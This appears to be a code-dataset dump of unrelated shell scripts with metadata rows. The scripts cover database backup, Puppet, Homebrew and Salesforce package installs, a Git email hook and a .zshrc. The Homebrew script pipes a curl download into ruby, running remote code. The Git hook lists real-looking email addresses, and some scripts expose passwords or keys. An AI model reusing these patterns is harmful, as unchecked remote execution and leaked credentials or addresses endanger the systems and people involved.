# redirect stdout/stderr to a file
exec &> /var/log/logfile.log
mv -v $BACKUP_last/* $BACKUP_old
# run dump
echo " ***running dump*** "
if [ -f "$BACKUP_old/$DAILY_DELETE_NAME.sql" ]; then
echo " moving weekly files "
mv -v $BACKUP_old/$DAILY_DELETE_NAME.sql $BACKUP_old/weekly
mv -v $BACKUP_old/$DAILY_DELETE_NAME.txt $BACKUP_old/weekly
fi
if [ -f "$BACKUP_old/$MONTHLY_DELETE_NAME.sql" ]; then
echo " moving monthly files "
mv -v $BACKUP_old/$MONTHLY_DELETE_NAME.sql $BACKUP_old/monthly
mv -v $BACKUP_old/$MONTHLY_DELETE_NAME.txt $BACKUP_old/monthly
fi
mysqldump --user=$MYSQL_USER --password=$MYSQL_PASSWORD --single-transaction --quick --lock-tables=false $DB > $BACKUP_last/daily-$TODAY.sql
echo "daily-$TODAY.sql has been created"
#create HASH
md5sum $BACKUP_last/daily-$TODAY.sql > $BACKUP_last/daily-$TODAY.txt
echo "Hash $BACKUP_last/daily-$TODAY.txt has been created"
#
| true
|
0bac2b7b8ea9a83e850852ae95f937f73805cda1
|
Shell
|
ycwu1030/cxSMScan
|
/RuncxSM.sh
|
UTF-8
| 328
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
id=1
dir=$(pwd)
cd cxSMThermalMassOnly
make clean; make
cd $dir
datadir=$dir/Data
mkdir -p $datadir
mkdir -p $datadir/cxx
mkdir -p $datadir/cosmo
while [ $id -le 10 ]
do
printf -v ID "%02d" ${id}
screen -S CXSM0828"$ID" -d -m bash -c "./cxSMSingleRun.sh $datadir "$id"; exec bash;"
id=$[$id+1]
done
| true
|
b565776ab6bbd3c473436682eef133dea9de56db
|
Shell
|
ftravers/arch-home
|
/bin/git-hooks-post-receive
|
UTF-8
| 1,040
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
mail_fenton=true
mail_ii=true
mail_cisco=true
mail_avaya=true
mail_oracle=false
ii_emails=("brett.holleman@inin.com" "david.fuller@inin.com")
cisco_emails=("jahayden@cisco.com" "sbehzad@cisco.com")
avaya_emails=("ssmith@avaya.com" "abouzemberg@avaya.com" "krcouls@avaya.com")
fenton_emails=("fenton.travers@gmail.com")
oracle_emails=("fenton.travers@oracle.com" "christophe.bayle@oracle.com" "matthew.leathers@oracle.com" "lawrence.johnson@oracle.com" "scott.glascock@oracle.com""ian.mclaughlan@oracle.com" "ruben.lihet@oracle.com")
repo="`pwd | awk 'BEGIN { FS = "/" } ; { print $(NF) }' | awk 'BEGIN { FS = "." } ; { print $1 }'`"
emailMessage() {
email=$1
git log -1 --stat --pretty=format:"%h %an %ae %n %s" | mail -s "$repo: repo has been modified." $email
}
if [ $mail_fenton ] ; then
for email in "${fenton_emails[@]}"
do
emailMessage $email
done
fi
if [ $mail_ii ] ; then
for email in "${ii_emails[@]}"
do
emailMessage $email
done
fi
if [ $mail_avaya ] ; then
for email in "${avaya_emails[@]}"
do
emailMessage $email
done
fi
if [ $mail_cisco ] ; then
for email in "${cisco_emails[@]}"
do
emailMessage $email
done
fi
| true
|
d130ed3dc3ace3d5a00185f29e1036516a151863
|
Shell
|
konfarandras/sfdx-travisci
|
/installpackage.sh
|
UTF-8
| 766
| 2.96875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -x
set -e
DESCRIPTION=testdescription
DEVHUB=TDevHub
PACKAGENAME=teltestpackage
TARGET=telkonfara
KEY=keyunicon19
echo starting installation of package...
#sfdx force:package:create --name $PACKAGENAME --description $DESCRIPTION --packagetype Unlocked --path force-app --nonamespace --targetdevhubusername $DEVHUB
sfdx force:package:version:create -p $PACKAGENAME -k $KEY --wait 10 -v $DEVHUB
PACKAGES=`jq '.packageAliases' sfdx-project.json | jq 'keys'`
LASTPACKAGE=`echo $PACKAGES | jq length`
LASTPACKAGE=$(($LASTPACKAGE-1))
VERSION=`echo $PACKAGES | jq ".[$LASTPACKAGE]"`
VERSION=${VERSION//\"}
sfdx force:package:version:promote -n -p $VERSION
sfdx force:package:install --wait 10 --publishwait 10 --package $VERSION -k $KEY -r -u $TARGET
| true
|
9b73114e89dd61c31a5cbe21368cfec8ac3f9d3a
|
Shell
|
virtualparadox/BBMap
|
/pipelines/fetch/runRefSeqProtein.sh
|
UTF-8
| 2,373
| 2.5625
| 3
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
#!/bin/bash
#SBATCH -J sketch_refseq
#SBATCH -q genepool
#SBATCH -A gtrqc
#SBATCH -N 1
#SBATCH -C haswell
#SBATCH -t 71:00:00
#SBATCH --error=log_%j.err
#SBATCH --output=log_%j.out
#SBATCH --exclusive
set -e
#Written by Brian Bushnell
#Last updated August 19, 2019
#Filters prokaryotic clades, translates them to protein, and sketches them.
#To use this script outside of NERSC, modify $TAXPATH to point to your directory with the BBTools taxonomy data,
#e.g. TAXPATH="/path/to/taxonomy_directory/"
TAXPATH="auto"
#Ensure necessary executables are in your path
#module load pigz
mkdir prot
time filterbytaxa.sh in=sorted.fa.gz out=prot/prok.fa.gz fastawrap=4095 ids=Viruses,Bacteria,Archaea,plasmids tree=auto -Xmx16g include taxpath=$TAXPATH zl=9 requirepresent=f
cd prot
wget -q -O - ftp://ftp.ncbi.nlm.nih.gov/refseq/release/protozoa/*genomic.fna.gz | gi2taxid.sh -Xmx1g in=stdin.fa.gz out=protozoa.fa.gz zl=9 server ow
wget -q -O - ftp://ftp.ncbi.nlm.nih.gov/refseq/release/mitochondrion/*genomic.fna.gz | gi2taxid.sh -Xmx1g in=stdin.fa.gz out=mito.fa.gz zl=9 server ow
wget -q -O - ftp://ftp.ncbi.nlm.nih.gov/refseq/release/plastid/*genomic.fna.gz | gi2taxid.sh -Xmx1g in=stdin.fa.gz out=chloro.fa.gz zl=9 server ow
time callgenes.sh in=prok.fa.gz outa=prok.faa.gz -Xmx16g ow ordered=f zl=9
time callgenes.sh in=protozoa.fa.gz outa=protozoa.faa.gz -Xmx16g ow ordered=f zl=9
time callgenes.sh in=mito.fa.gz outa=mito.faa.gz -Xmx16g ow ordered=f zl=9
time callgenes.sh in=chloro.fa.gz outa=chloro.faa.gz -Xmx16g ow ordered=f zl=9
cat prok.faa.gz mito.faa.gz chloro.faa.gz protozoa.faa.gz > all.faa.gz
time sketchblacklist.sh -Xmx63g in=prok.faa.gz prepasses=1 tree=auto taxa taxlevel=family ow out=blacklist_prokprot_family_40.sketch mincount=40 k=9,12 sizemult=3 amino taxpath=$TAXPATH
time sketchblacklist.sh -Xmx63g in=prok.faa.gz prepasses=1 tree=auto taxa taxlevel=genus ow out=blacklist_prokprot_genus_80.sketch mincount=80 k=9,12 sizemult=3 amino taxpath=$TAXPATH
mergesketch.sh -Xmx1g in=blacklist_prokprot_genus_80.sketch,blacklist_prokprot_family_40.sketch out=blacklist_prokprot_merged.sketch amino name0=blacklist_prokprot_merged k=9,12 ow
time bbsketch.sh -Xmx63g in=all.faa.gz out=taxa#.sketch mode=taxa tree=auto files=31 ow unpigz minsize=200 prefilter autosize blacklist=blacklist_prokprot_merged.sketch k=9,12 depth sizemult=3 amino taxpath=$TAXPATH
| true
|
86ed964d7bceb864030984ffbcab5e33640ee7fb
|
Shell
|
Linux-Project-Puppet-Deploy/puppet-install-script
|
/install.sh
|
UTF-8
| 1,454
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/sh
#
#
# This script install puppet sources
#
# Usage : install.sh [agent|server] [hostname] [puppet_ip] [puppet_dns]
PACKAGE_NAME=""
FILENAME="puppetlabs-release-pc1-jessie.deb"
case $1 in
"agent")
PACKAGE_NAME="puppet-agent"
[ "$#" -ne 4 ] && echo "Agent parameters are wrong" && exit 1
echo "$3\t$4" >> /etc/hosts
;;
"server")
PACKAGE_NAME="puppetserver"
;;
*)
echo "Wrong argument (agent|server)"
exit 1
;;
esac
echo "Install required packages..."
apt-get install -y ca-certificates >/dev/null 2>&1
[ $? -ne 0 ] && echo "Packages / Download failed" && exit 1
wget -P /tmp/ -q https://apt.puppetlabs.com/$FILENAME
[ $? -ne 0 ] && echo "Puppetlabs / Downlaod failed" && exit 1
dpkg -i /tmp/puppetlabs-release-pc1-jessie.deb >/dev/null 2>&1
[ $? -ne 0 ] && echo "Puppetlabs / Installation failed" && exit 1
apt-get update >/dev/null 2>&1
[ $? -ne 0 ] && echo "Update failed" && exit 1
apt-get install -y $PACKAGE_NAME >/dev/null 2>&1
if [ $? -eq 0 ]; then
if [ $1 = "agent" ]; then
[ ! -f /etc/puppetlabs/puppet/puppet.conf ] && echo "Puppet Agent .conf not found" && exit 1
cat << EOF > /etc/puppetlabs/puppet/puppet.conf
[main]
certname = $2.ynov.co
server = $4
environment = production
runinterval = 10m
EOF
fi
echo "Successfully"
echo "##"
echo "## Please run : /opt/puppetlabs/bin/puppet agent -t"
echo "##"
else
echo "$PACKAGE_NAME installation failed"
exit 1
fi
| true
|
4f2ad7d5a858060f5c383e9d161c9c13b11df5d8
|
Shell
|
docker-in-practice/image-stepper
|
/example/tag.sh
|
UTF-8
| 159
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
x=1
for id in $(docker history -q "myimage:latest" | grep -vw missing | tac)
do
docker tag "${id}" "myimage:latest_step_${x}"
((x++))
done
| true
|
1ba68e15c2ee8f14328b5e7de049d29ac47f06c6
|
Shell
|
akora/vagrant-project-templates
|
/project-name/vagrant-scripts/install-git.sh
|
UTF-8
| 1,205
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# be careful with the source path below! it seems /vagrant/ is the path "inside" the VM!
source /vagrant/vagrant-scripts/shell-utils.sh
git_version="2.3.0" # << feel free to change it
git_global_user_name="<Your name goes here>"
git_global_email="<Your email address goes here>"
install_dir="/home/vagrant"
cd $install_dir
print_header "Installing Git"
print_message "Installing required dependencies first..." "\n"
apt-get install -y autoconf gettext libcurl4-gnutls-dev libexpat1-dev zlib1g-dev libssl-dev
print_message "Getting latest source code..." "\n"
wget https://github.com/git/git/archive/v$git_version.tar.gz
tar -zxf v$git_version.tar.gz
print_message "Compiling it..." "\n"
cd git-$git_version
make configure
./configure --prefix=/usr
make
make install
git --version
print_message "Setting global variables..." "\n"
sudo -u vagrant git config --global user.name "$git_global_user_name"
sudo -u vagrant git config --global user.email $git_global_email
# switching to the vagrant user to see the user's git config list
sudo -u vagrant git config --list
cd $install_dir
print_message "Cleaning up..." "\n"
rm -rf git-$git_version
rm v$git_version.tar.gz
exit 0
| true
|
bc760ae4ec63956b1b85c853f6dfe630abced05d
|
Shell
|
weichou1229/edgex-taf
|
/TAF/utils/scripts/docker/restart-services.sh
|
UTF-8
| 498
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
CONFIG_DIR=/custom-config
docker run --rm -v ${WORK_DIR}:${WORK_DIR} -w ${WORK_DIR} -v /var/run/docker.sock:/var/run/docker.sock \
--env WORK_DIR=${WORK_DIR} --env PROFILE=${PROFILE} --security-opt label:disable \
--env-file ${WORK_DIR}/TAF/utils/scripts/docker/common-taf.env --env CONFIG_DIR=${CONFIG_DIR} \
${COMPOSE_IMAGE} docker compose -f "${WORK_DIR}/TAF/utils/scripts/docker/docker-compose.yml" \
restart $*
# Waiting for service started
sleep 2
| true
|
ee5529ee14dcf6528a1fd8ba064b73a33f42e5ae
|
Shell
|
FabioLolix/PKGBUILD-AUR_fix
|
/zz_wip/ldmicro/PKGBUILD
|
UTF-8
| 782
| 2.59375
| 3
|
[
"WTFPL"
] |
permissive
|
# Maintainer:
pkgname=ldmicro
pkgver=5.4.1.1
pkgrel=1
pkgdesc="Ladder Logic for PIC and AVR"
arch=(x86_64)
url="https://cq.cx/ladder.pl"
license=(GPL3)
depends=()
makedepends=(cmake ninja perl)
#options=(!makeflags)
source=("${pkgname}-${pkgver}.tar.gz::https://github.com/LDmicro/LDmicro/archive/refs/tags/${pkgver}.tar.gz")
sha256sums=('12f7cc534452deaf8260a65bb088db699adc5234f7ec925d546245895ec9745b')
prepare() {
cd LDmicro-${pkgver}/ldmicro
[[ -d build ]] || mkdir build
cp -r PASCAL.CPP pascal.cpp
cp -r PCPORTS.CPP pcports.cpp
}
build() {
cd "LDmicro-${pkgver}/ldmicro/build"
cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=None \
-DCMAKE_INSTALL_PREFIX=/usr
ninja
}
package() {
cd "LDmicro-${pkgver}/ldmicro/build"
make DESTDIR="${pkgdir}" install
}
| true
|
152b85cd883bd69a4b02ab3fea60075425c27b5a
|
Shell
|
mbillard/expo-cli
|
/bin/bootstrap
|
UTF-8
| 395
| 2.90625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -eo pipefail
scriptdir=$(dirname ${BASH_SOURCE[0]})/../node_modules/.bin
scopeArgs=()
for arg in "$@"; do
scopeArgs+=("--scope" "$arg")
done
scopeArgs+=("--include-filtered-dependencies" "--sort")
"${scriptdir}/lerna" bootstrap "${scopeArgs[@]}"
"${scriptdir}/lerna" run "${scopeArgs[@]}" --stream prepare
echo "for link information invoke 'yarn workspaces info'"
| true
|
1eb188c7fcb9678e7f42dd7c2ab9fbb0e56dcac7
|
Shell
|
allmende/watchtower
|
/rootfs/etc/s6/watchtower/setup
|
UTF-8
| 571
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ -n "${WATCHTOWER_TLS_CA}" ]
then
if [ ! -f "${WATCHTOWER_TLS_CA}" ]
then
echo -e "${WATCHTOWER_TLS_CA}" >| /tmp/ca.crt
WATCHTOWER_TLS_CA="/tmp/ca.crt"
fi
fi
if [ -n "${WATCHTOWER_TLS_KEY}" ]
then
if [ ! -f "${WATCHTOWER_TLS_KEY}" ]
then
echo -e "${WATCHTOWER_TLS_KEY}" >| /tmp/docker.crt
WATCHTOWER_TLS_KEY="/tmp/docker.crt"
fi
fi
if [ -n "${WATCHTOWER_TLS_CERT}" ]
then
if [ ! -f "${WATCHTOWER_TLS_CERT}" ]
then
echo -e "${WATCHTOWER_TLS_CERT}" >| /tmp/docker.key
WATCHTOWER_TLS_CERT="/tmp/docker.key"
fi
fi
| true
|
7134123f3cc62a943703b84d9c916d1930d58e21
|
Shell
|
alvarcarto/alvarcarto-cartocss
|
/tools/build.sh
|
UTF-8
| 1,001
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# Usage: bash tools/build.sh [style]
# Run from repository root!
set -e
set -x
mkdir -p dist
rm -f dist/*.xml
find ./styles -name 'generated-project.mml' -delete
find ./styles -name 'generated-styles.mss' -delete
dir_suffix=""
if [[ -n "$1" ]]; then
dir_suffix="/$1"
fi
# Convert templates to full project files
for i in $(find ./styles$dir_suffix -name 'project-sheet.mml');
do
dir=$(dirname "$i")
node js/convert-to-project.js "$i" > "$dir/generated-project.mml"
done
# Generate styles with JS
for i in $(find ./styles$dir_suffix -name 'styles.js');
do
dir=$(dirname "$i")
node js/generate.js "$i" > "$dir/generated-styles.mss"
done
# Generate styles with JS
for i in $(find ./styles$dir_suffix -name 'generated-project.mml');
do
dir=$(dirname "$i")
style=$(basename "$dir")
# Make warnings quiet, see: https://github.com/gravitystorm/openstreetmap-carto/issues/3183.
# Use certain mapnik API version
carto --api 3.0.23 --quiet "$i" > "dist/$style.xml"
done
| true
|
33850e3425cf07deeb41271d49d3b8dad295b59b
|
Shell
|
jasedit/dotphiles
|
/bash/bash_aliases
|
UTF-8
| 1,206
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
alias update-aliases="wget -q -O - \"$@\" https://alias.sh/user/1370/alias >> ~/.aliassh"
alias dotsync='~/.dotfiles/dotsync/bin/dotsync'
execute-over-ssh() {
if [ $# -ne 2 ]; then
echo "USAGE: execute-over-ssh 'server1 server2 server3' 'command1; command2; command3'"
return 1
else
servers=(${=1})
for server in $servers
do
echo ""
echo "----> Executing $2 on $server"
ssh $server "$2"
echo ""
done
return 0
fi
}
function authme() {
ssh "$1" 'mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys' \
< ~/.ssh/id_dsa.pub
}
extract () {
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar e $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
alias tm='ps -ef | grep'
| true
|
39768ddff72135e43bcf49aed823ec4194e3eb42
|
Shell
|
mjmerin/config_files
|
/brewinstalls.sh
|
UTF-8
| 1,167
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
# Homebrew All the Things I Need
#
# Install all the things I need on a macos system using Homebrew
# To execute: save and `chmod +x ./brewinstalls.sh` then `./brewinstalls.sh`
echo "Installing Homebrew..."
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
echo "Installing brew cask..."
brew tap caskroom/cask
#Programming Languages
echo "Installing Programming Languages..."
brew install node
brew install python3
brew install ruby
#Dev Tools
echo "Installing SW Development Tools..."
brew install bash-completion
brew install git
brew install git-extras
brew install tree
brew install watch
brew cask install dash
brew cask install emacs
brew cask install iterm2
brew cask install macvim
brew cask install visual-studio-code
#Communication Apps
echo "Installing Communication Apps"
brew cask install skype
brew cask install slack
#Web Stuff
echo "Installing Browsers..."
brew cask install firefox
brew cask install google-chrome
#Productivity Tools
echo "Installing Productivity Tools..."
brew install htop
brew install the_silver_searcher
brew install tmux
brew install googler
brew install dict
| true
|
e2acc92b8eae16c7b6fd0f81db3612d0b466b3d7
|
Shell
|
skiv71/BMSLink-core
|
/com/dev-del
|
UTF-8
| 192
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
# args
sn=$1
# initialise
path=$(dev-path $sn)
# check
[ -n "$path" ] || exit 1
# initialise
table=devices
# main
bms-sql DELETE FROM $table WHERE serial=\"$sn\"
rm -rf $path
| true
|
e037c05dbf8520564c39f9a2cf8e8a798d8871c0
|
Shell
|
RustyToms/dotfiles
|
/modules/npm/npm_run.sh
|
UTF-8
| 1,183
| 3.953125
| 4
|
[] |
no_license
|
#!/bin/zsh
# Utility to quickly switch between difference NPM
# accounts using auth tokens.
#
# This utility requires that you define environment
# variables based on the following rules:
#
# - `NPM_AUTH_TOKEN_<profile>`=<auth token>
#
# where profile is your desired profile name.
#
# This script will set `NPM_AUTH_TOKEN` with the
# resulting token. Make sure your `.npmrc` file
# is configured to read from it.
set -u
set -e
if [ "$#" -lt 2 ]; then
echo "Usage: $0 <profile> <command...>" 1>&2
exit 1
fi
# Transform to uppercase
# See http://stackoverflow.com/a/11392235/1641422
ARGV_PROFILE=$(echo "$1" | tr '[:lower:]' '[:upper:]')
TOKEN_ENVIRONMENT_VARIABLE="NPM_AUTH_TOKEN_$ARGV_PROFILE"
# We need to check the variable exists before attempting
# to blindly expand it afterwards to avoid shell errors
if ! set | grep --text "^$TOKEN_ENVIRONMENT_VARIABLE" >/dev/null; then
echo "Unknown profile: $ARGV_PROFILE"
exit 1
fi
echo "Loading profile $ARGV_PROFILE..."
# Dynamically expand variable
# See http://unix.stackexchange.com/a/251896/43448
export NPM_AUTH_TOKEN=$(print -rl -- ${(P)TOKEN_ENVIRONMENT_VARIABLE})
echo "Logged in as $(npm whoami)"
npm ${@:2}
| true
|
8262ff286dd60d56c2ac983fe02ae7a9d93004b9
|
Shell
|
rackerlabs/autoscale-cruft
|
/monitoring/plugins/zookeeper_check.sh
|
UTF-8
| 183
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
output=$(echo ruok | nc localhost 2181)
if [ $output != 'imok' ]; then
echo "status CRITICAL zookeeper not healthy"
exit 1
fi
echo "status OK zookeeper is healthy"
| true
|
fd9d6f77a7ad6673cda5d1c7b495a111265e50a9
|
Shell
|
revspace/statelogger
|
/create-heatmaps
|
UTF-8
| 300
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
c='./sldump --heatmap --json'
o='heatmaps'
[ -e $o ] || mkdir $o
$c > $o/alltime.json &
$c --days 7 > $o/7days.json
$c --days 70 > $o/70days.json
$c --days 365 > $o/365days.json
for year in $(seq 2010 $(date +%Y)); do
$c --period $year > $o/year$year.json
done
wait
| true
|
fd7fd0509fc09ee9d24646c286d392e472b81a7d
|
Shell
|
subnut/dotfiles-old
|
/linux/home/.zshrc
|
UTF-8
| 14,602
| 2.921875
| 3
|
[] |
no_license
|
# Keep this ABOVE p10k instant prompt
# Otherwise it gets set to "not a tty"
export GPG_TTY=$(tty)
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
# If you come from bash you might have to change your $PATH.
# export PATH=$HOME/bin:/usr/local/bin:$PATH
# Path to your oh-my-zsh installation.
export ZSH="/home/subhaditya/.oh-my-zsh"
# Set name of the theme to load --- if set to "random", it will
# load a random theme each time oh-my-zsh is loaded, in which case,
# to know which specific one was loaded, run: echo $RANDOM_THEME
# See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
ZSH_THEME="powerlevel10k/powerlevel10k"
#ZSH_THEME="robbyrussell"
# Set list of themes to pick from when loading at random
# Setting this variable when ZSH_THEME=random will cause zsh to load
# a theme from this variable instead of looking in ~/.oh-my-zsh/themes/
# If set to an empty array, this variable will have no effect.
# ZSH_THEME_RANDOM_CANDIDATES=( "robbyrussell" "agnoster" )
# Uncomment the following line to use case-sensitive completion.
# CASE_SENSITIVE="true"
# Uncomment the following line to use hyphen-insensitive completion.
# Case-sensitive completion must be off. _ and - will be interchangeable.
# HYPHEN_INSENSITIVE="true"
# Uncomment the following line to disable bi-weekly auto-update checks.
# DISABLE_AUTO_UPDATE="true"
# Uncomment the following line to automatically update without prompting.
# DISABLE_UPDATE_PROMPT="true"
# Uncomment the following line to change how often to auto-update (in days).
# export UPDATE_ZSH_DAYS=13
# Uncomment the following line if pasting URLs and other text is messed up.
# DISABLE_MAGIC_FUNCTIONS=true
# Uncomment the following line to disable colors in ls.
# DISABLE_LS_COLORS="true"
# Uncomment the following line to disable auto-setting terminal title.
# DISABLE_AUTO_TITLE="true"
# Uncomment the following line to enable command auto-correction.
ENABLE_CORRECTION="true"
# Uncomment the following line to display red dots whilst waiting for completion.
COMPLETION_WAITING_DOTS="true"
# Uncomment the following line if you want to disable marking untracked files
# under VCS as dirty. This makes repository status check for large repositories
# much, much faster.
# DISABLE_UNTRACKED_FILES_DIRTY="true"
# Uncomment the following line if you want to change the command execution time
# stamp shown in the history command output.
# You can set one of the optional three formats:
# "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
# or set a custom format using the strftime function format specifications,
# see 'man strftime' for details.
# HIST_STAMPS="mm/dd/yyyy"
# Would you like to use another custom folder than $ZSH/custom?
# ZSH_CUSTOM=/path/to/new-custom-folder
# Which plugins would you like to load?
# Standard plugins can be found in ~/.oh-my-zsh/plugins/*
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(git sudo fancy-ctrl-z zsh_reload taskwarrior virtualenv pyenv zsh-autosuggestions fzf wd z fast-syntax-highlighting)
source $ZSH/oh-my-zsh.sh
# User configuration
# export MANPATH="/usr/local/man:$MANPATH"
# You may need to manually set your language environment
# export LANG=en_US.UTF-8
# Preferred editor for local and remote sessions
# if [[ -n $SSH_CONNECTION ]]; then
# export EDITOR='vim'
# else
# export EDITOR='mvim'
# fi
# Compilation flags
# export ARCHFLAGS="-arch x86_64"
# Set personal aliases, overriding those provided by oh-my-zsh libs,
# plugins, and themes. Aliases can be placed here, though oh-my-zsh
# users are encouraged to define aliases within the ZSH_CUSTOM folder.
# For a full list of active aliases, run `alias`.
#
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
if [[ $TERM == (dumb|linux) ]]; then
POWERLEVEL9K_CONFIG_FILE=~/.p10k-portable.zsh
else
POWERLEVEL9K_CONFIG_FILE=~/.p10k.zsh
fi
[[ ! -f $POWERLEVEL9K_CONFIG_FILE ]] || source $POWERLEVEL9K_CONFIG_FILE
# Add Games to PATH
export PATH=/usr/games:$PATH
## fzf Fuzzy Finder
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
## pyenv
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
# colorls
# export PATH="$PATH:/home/subhaditya/.gem/ruby/2.7.0/bin/"
# alias ls="colorls"
# my_run_bat () { cat $1 | powershell.exe -Command "& {cmd.exe}" - }
# my_run_bat_2 () { cat $1 | powershell.exe -Command "& {cd c:; cmd.exe /Q}" - }
# my_run_bat_3 () { powershell.exe "cd c:; & \"$( wslpath -w $1)\"" }
my_run_bat_4 () { # {{{
if [[ $* =~ (-h) || -z $* ]]
then echo "Execute Windows Batch files from WSL
Usage: runbat [options] path
Options:
-h or --help Show this help window and exit
Executes the specified file at the C: drive.
If C: is unavailable, then executes at the CMD default (Windows) directory."
return; fi
powershell.exe "cd c:; & \"$( wslpath -w $1)\""
} # }}}
alias runbat=my_run_bat_4
alias gaav="git add --all --verbose"
alias gdh="git diff HEAD"
alias gdh1="git diff HEAD~1 HEAD"
my_diff () { colordiff -u $* | less }
alias diff=my_diff
alias la1="la -1"
yays () { yay -S $(yay -Ss $* | cut -d' ' --fields=1 | grep . | fzf --multi) --needed }
yayss () { yay -Ss $* }
pacs () { sudo pacman -S $(pacman -Ss $* | cut -d' ' --fields=1 | grep . | cut --fields=2 -d'/' | fzf --multi) --needed }
pacr () { sudo pacman -R $(pacman -Qe $* | cut --fields=2 -d'/' | cut --fields=1 -d' '| fzf --multi --preview-window 'right:50%:nohidden:wrap' --preview 'pacman -Qi {} | grep "Name\|Version\|Description\|Required By\|Optional For\|Install Reason\|Size\|Groups" | cat') }
pacrr () { sudo pacman -R $(pacman -Q $* | cut --fields=2 -d'/' | cut --fields=1 -d' '| fzf --multi --preview-window 'right:50%:nohidden:wrap' --preview 'pacman -Qi {} | grep "Name\|Version\|Description\|Required By\|Optional For\|Install Reason\|Size\|Groups" | cat') }
alias ydl=youtube-dl
alias pacss="pacman -Ss"
my_calendar () { while true; do tput civis;clear; cal; sleep $(( 24*60*60 - `date +%H`*60*60 - `date +%M`*60 - `date +%S` )); done }
emojiinputtool () { while true; do
codepoints="$(jome -f cp -p U)"
if [ $? -ne 0 ]; then
exit 1
fi
xdotool key --delay 20 $codepoints
done }
bindkey "^[" vi-cmd-mode
alias monitorsetuptool="echo mons"
alias datausage=vnstat
alias ":q"=exit
alias ":Q"=exit
alias "cd.."="cd .."
vpn () { protonvpn $* && return true; echo "Running as root ..."; sudo protonvpn $*; timedatectl set-timezone Asia/Kolkata }
vimman () { man $* | vim - }
nvimman () { man $* | nvim - }
export EDITOR=nvim
export DIFFPROG="nvim -d"
export PATH=/home/subhaditya/.local/bin:$PATH
# pyenv global $(for x in $(pyenv version | cut -f1 -d' '); do echo -n "$x "; done)
# pyenv global system pypy3.6-7.3.1
export PATH=/home/subhaditya/Notes/:$PATH
alias notes=notes.sh
# if [[ -z $DISPLAY ]]; then export DISPLAY=:0; fi
my_man () { if [[ $* = 'z' ]] ; then sh -c "man ~/.oh-my-zsh/plugins/z/z.1"; else sh -c "man $*"; fi }
# alias man=my_man
export PATH=./:$PATH
alias cameradisable="sudo chmod -r /dev/video*"
alias cameraenable="sudo chmod ug+r /dev/video*"
alias camerastatus="l /dev/video*"
if ! [[ -z $MY_NVIM_BG ]] && [[ $KITTY_WINDOW_ID -eq 1 ]]
then echo 'if [[ $MY_NVIM_BG == "light" ]];then export MY_NVIM_BG="dark"; alias colorls="colorls"; export BAT_THEME="gruvbox (Dark) (Hard)"; fi' > ~/.config/kitty/custom_zsh_source
fi
# get_theme () {
# if my_variable_for_color=$(kitty @ get-colors)
# then
# if [[ $( echo $my_variable_for_color | grep color0 | cut -d'#' -f2) = '000000' ]]
# then
# export MY_NVIM_BG='light'
# echo 'if [[ $MY_NVIM_BG == "dark" ]];then export MY_NVIM_BG="light"; fi' > ~/.config/kitty/custom_zsh_source
# else
# export MY_NVIM_BG='dark'
# echo > ~/.config/kitty/custom_zsh_source
# fi
# fi
# }
get_theme () { source ~/.config/kitty/custom_zsh_source }
if ! [[ -z $MY_NVIM_BG ]]; then source ~/.config/kitty/custom_zsh_source; fi
toggle_theme () { # {{{
get_theme
if [[ $MY_NVIM_BG == 'dark' ]]
then export MY_NVIM_BG='light'
kitty @ set-colors -a -c ~/.config/kitty/gruvbox_light_hard.conf
alias colorls="colorls --light"
export BAT_THEME="gruvbox (Light) (Hard)"
echo 'if [[ $MY_NVIM_BG == "dark" ]];then export MY_NVIM_BG="light"; alias colorls="colorls --light"; export BAT_THEME="gruvbox (Light) (Hard)"; fi' > ~/.config/kitty/custom_zsh_source
else if [[ $MY_NVIM_BG == 'light' ]]
then export MY_NVIM_BG='dark'
kitty @ set-colors -a -c ~/.config/kitty/gruvbox_dark_hard.conf
alias colorls="colorls"
export BAT_THEME="gruvbox (Dark) (Hard)"
